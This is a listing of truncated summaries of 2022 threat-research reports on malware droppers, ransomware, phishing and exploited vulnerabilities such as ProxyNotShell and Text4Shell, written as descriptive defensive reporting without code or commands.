A malware dropper uses Outlook.com email as its command-and-control channel, polling a mailbox via IMAP and exfiltrating results back through email. The Python-based dropper decrypts a payload with AES, executes commands via a shell, and uses base64/ROT13 enco…
Category: Threat Research
Two security analyses reveal attacks against vulnerable Apache Tomcat servers that are not up to date, using JexBoss to install a WebShell and gain control with Meterpreter. The attackers then use a Base64-encoded PowerShell downloader to fetch and run scripts…
Checkpoint’s Brand Phishing Report for Q3 2022 shows DHL as the brand most impersonated in phishing attempts (22%), with Microsoft (16%) and LinkedIn (11%) following; Instagram also enters the top ten due to a blue-badge phishing campaign. The report highlight…
Dormant Colors describes a widespread campaign of malicious browser extensions that infect millions of users via malvertising, then covertly load and update weaponized code to harvest data and enable targeted fraud. The investigation exposes a robust, globally…
Two-sentence summary: The Magniber ransomware has evolved rapidly in 2022, shifting file extensions, injection techniques, and UAC bypass methods to dodge anti-malware detection. The analysis highlights frequent format changes and registry-focused tactics, alo…
Trend Micro analyzed an LV ransomware intrusion tied to ProxyShell and ProxyLogon exploits affecting a Jordan-based company, highlighting double-extortion and expanding affiliate activity. The report details the infection chain—from Exchange vulnerabilities an…
RDP is commonly used for initial compromise and lateral movement, including via wrappers when native remote desktop support is unavailable. The article also covers how attackers add user accounts, drop RDP-related malware, and employ credential theft and sessi…
Two Zscaler ThreatLabz reports reveal WarHawk, a new backdoor used by the SideWinder APT to target Pakistan, delivering Cobalt Strike via a multi-module loader that includes KernelCallBackTable injection and a Pakistan Standard Time check. The campaign leverag…
Daixin Team is a ransomware and data extortion group focused on Healthcare and Public Health sector targets in the U.S., using VPN compromises and credential theft to deploy ransomware on ESXi servers and exfiltrate data. The FBI/CISA/HHS advisory details TTPs…
Palo Alto Networks analyzes trends in web threats by examining malicious landing and host URLs, including where they are hosted, their categories, and associated malware families, with a focus on cryptominers, JS downloaders, web skimmers, and redirects. The r…
Cyble researchers describe Temp Loader and Temp Stealer, malicious tools advertised on the Dark Web that bundle with cracked software to drop a loader and an information stealer. The malware targets crypto wallets and various data sources, uses anti-VM and Run…
Attackers increasingly abuse legitimate remote-control tools to secretly take control of infected systems and evade detection. The article surveys backdoor and RAT families and real-world cases where tools like AnyDesk, TeamViewer, and VNC are misused for remo…
In April, VMware patched CVE-2022-22954, but attacks exploiting remote code execution via server-side template injection persisted, delivering Mirai variants, RAR1Ransom, and GuardMiner payloads to exposed VMware Workspace ONE Access and Identity Manager insta…
Wordfence Threat Intelligence monitored exploit attempts targeting CVE-2022-42889, aka Text4Shell, across millions of sites and observed payloads in DNS, script, and URL prefixes aimed at remote code execution. Most activity leverages DNS prefix probes to cont…
Two zero-day Exchange vulnerabilities, CVE-2022-41040 and CVE-2022-41082 (ProxyNotShell), are being actively exploited in the wild, with over 1.6 million exploit attempts observed across 4 million protected websites. The activity shows GET-based probing agains…